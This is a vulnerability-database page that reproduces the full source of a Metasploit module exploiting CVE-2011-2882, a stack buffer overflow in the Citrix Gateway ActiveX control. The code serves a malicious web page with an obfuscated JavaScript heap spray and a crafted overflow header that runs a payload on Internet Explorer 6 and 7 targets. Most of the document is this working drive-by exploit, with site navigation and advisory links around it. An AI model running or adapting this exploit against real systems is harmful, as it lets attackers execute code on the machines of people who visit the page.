Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Citrix Gateway - ActiveX Control Stack Buffer Overflow (Metasploit)

🗓️ 31 Aug 2011 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 42 Views

Citrix Gateway ActiveX Control Stack Buffer Overflow (Metasploit). Exploits buffer overflow in ActiveX control, requires user interaction to execute code. Initial discovery by Michal Trojnara, bannedit and sinn3r

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability
31 Aug 201100:00
zdt
0day.today		Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability
30 Aug 201100:00
zdt
Circl		CVE-2011-2882
31 Aug 201100:00
circl
Tenable Nessus		Citrix Access Gateway Plug-in for Windows ActiveX Control Multiple Vulnerabilities (CTX129902)
22 Jul 201100:00
nessus
Check Point Advisories		Citrix Access Gateway Plug-in ActiveX Code Execution (CVE-2011-2882)
20 Dec 201100:00
checkpoint_advisories
CVE		CVE-2011-2882
21 Jul 201123:00
cve
Cvelist		CVE-2011-2882
21 Jul 201123:00
cvelist
Metasploit		Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability
30 Aug 201122:22
metasploit
NVD		CVE-2011-2882
21 Jul 201123:55
nvd
Packet Storm		Citrix Gateway ActiveX Control Stack Based Buffer Overflow
31 Aug 201100:00
packetstorm
Rows per page
##
# $Id: citrix_gateway_actx.rb 13670 2011-08-31 00:15:46Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability',
			'Description'    => %q{
					This module exploits a stack based buffer overflow in the Citrix Gateway 
				ActiveX control. Exploitation of this vulnerability requires user interaction. 
				The victim must click a button in a dialog to begin a scan. This is typical 
				interaction that users should be accustom to.

					Exploitation results in code execution with the privileges of the user who
				browsed to the exploit page.
					},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[
					'Michal Trojnara', #Initial discovery
					'bannedit',
					'sinn3r',
				],
			'Version'        => '$Revision: 13670 $',
			'References'     =>
				[
					[ 'CVE',  '2011-2882'],
					[ 'OSVDB', '74191'   ],
					[ 'URL', 'https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=929' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20\x3b\x81\x83\x88\x90",
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3', { 'Ret' => 0x0c0c0c0c } ],
					[ 'IE 7 on Windows XP SP3', { 'Ret' => 0x0c0c0b0b } ],
					[ 'IE 7 on Windows Vista',  { 'Ret' => 0x0c0c0b0b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 14 2011', #Coordinated public disclosure according to iDefense
			'DefaultTarget'  => 0))
	end

	def exploit
		@ocx = ::File.read(::File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2011-2882', 'nsepa.ocx'))
		super
	end

	def get_target(request)
		t = target
		agent = request.headers['User-Agent']

		vprint_status("User-Agent: #{agent}")

		if t.name =~ /Automatic/
			if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
				#Win XP + IE 6
				t = targets[1]
			elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
				#Win XP + IE 7
				t = targets[2]
			elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
				#Win Vista + IE7
				t = targets[2]
			elsif agent == 'nsepa'
				#Citrix Access Gateway requesting /epaq
				t = agent
			else
				#Target not supported
				t = nil
			end
		end

		return t, agent
	end

	def on_request_uri(cli, request)
		@mytarget, agent = get_target(request) if @mytarget.nil?
		vprint_status("Client requested: #{request.uri}.")

		#Target not supported, will not go on
		if @mytarget.nil?
			print_error("Target not supported: #{agent}")
			send_not_found(cli)
			return
		end

		if request.uri.match(/nsepa/)
			print_status("Sending nsepa.ocx to #{cli.peerhost}")
			send_response(cli, @ocx, { 'Content-Type' => 'application/binary' })
			return
		end

		if request.uri.match(/epaq/)
			padding = rand_text_alpha(300)

			csec = "eepa_0_"
			csec << padding[0, 259]
			csec << [@mytarget.ret].pack('V*')
			csec << padding[0, 68]

			result = rand_text_alpha(1000)
			send_response(cli, rand_text_alpha(30), { 'CSEC' => csec, 'RESULT' => result } )
			@mytarget = nil
			return
		end

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# payload in JS format
		code = Rex::Text.to_unescape(payload.encoded)

		#For debugging purposes: nops.substring(0,0x534) lands the payload exactly at 0x0c0c0c0c for IE6
		spray = <<-JS
		var heap_lib = new heapLib.ie(0x20000);
		var code = unescape("#{code}");
		var nops = unescape("%u0c0c%u0c0c");

		while (nops.length < 0x1000) nops += nops;
		var offset = nops.substring(0, 0x550);
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x20000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x10000-6)/2);

		heap_lib.gc();

		for (var i = 0; i < 0x6000; i++) {
			heap_lib.alloc(block);
		}
		JS

		spray = heaplib(spray)
		spray = ::Rex::Exploitation::JSObfu.new(spray)
		spray.obfuscate

		load = %Q|
		var d=document.getElementById("nsepadiv");
		if(d) {
			d.innerHTML=
			'<object id="nsepa" classid="CLSID:181BCAB2-C89B-4E4B-9E6B-59FA67A426B5" '+
			'width=1px height=1px codebase="#{get_resource}/epa/nsepa.ocx#version=8,0,59,1">' +
			'<param name="cookie" value="0123456789abcdef0123456789abcdef">'+
			'<param name="location" value="'+document.location+'">'+
			'<param name="trace" value="DEBUG">'+
			'<param name="vip" value="255.255.255.255">'+
			'</object>';
		} else {
		  alert('Internal Error');
		}
|
		# the ret slide gets executed via call [esi+45b]
		html = <<-EOS
		<html>
		<body>
		<div id="nsepadiv"></div>
		<script language="javascript">
		#{spray}
		#{load}
		</script>
		</body>
		</html>
		EOS

		html = html.gsub(/^\t\t/, '')

		# we need to handle direct /epaq requests
		proc = Proc.new do |cli, req|
			on_request_uri(cli, req)
		end

		add_resource({'Path' => "/epaq", 'Proc' => proc}) rescue nil
		print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}")
		send_response(cli, html, { 'Content-Type' => 'text/html' })
	end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2011 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 29.3
EPSS0.75848
citrix gatewaybuffer overflowcode executionuser interactionmichal trojnarabanneditsinn3rcve-2011-2882osvdb 74191idefense
42